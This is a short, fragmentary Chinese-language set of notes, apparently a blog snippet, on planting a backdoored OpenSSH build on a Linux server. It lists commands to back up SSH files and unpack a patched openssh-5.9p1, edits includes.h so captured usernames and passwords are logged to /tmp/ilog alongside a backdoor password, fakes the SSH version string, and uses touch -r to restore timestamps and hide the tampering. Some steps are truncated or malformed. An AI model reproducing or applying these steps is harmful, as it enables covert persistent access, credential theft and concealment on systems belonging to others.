找出读写的openSSH后门
1 | ps aux | grep "sshd" |
Linux获取版本信息
1 | cat /etc/issue |
Linux OpenSSH后门安装
备份SSH文件
1 | mv /etc/ssh/ssh_config /etc/ssh/ssh_config |
安装必备软件
1 | Centos |
解压并安装补丁
1 | tar zxf openssh-5.9p1.tar.gz |
修改includes.h配置记录用户名和密码的文件和后门密码
1 | #define ILOG "/tmp/ilog" |
修改版本
1 | #define SSH_VERSION "****" |
安装并编译
恢复日期
1 | touch -r ***.old *** |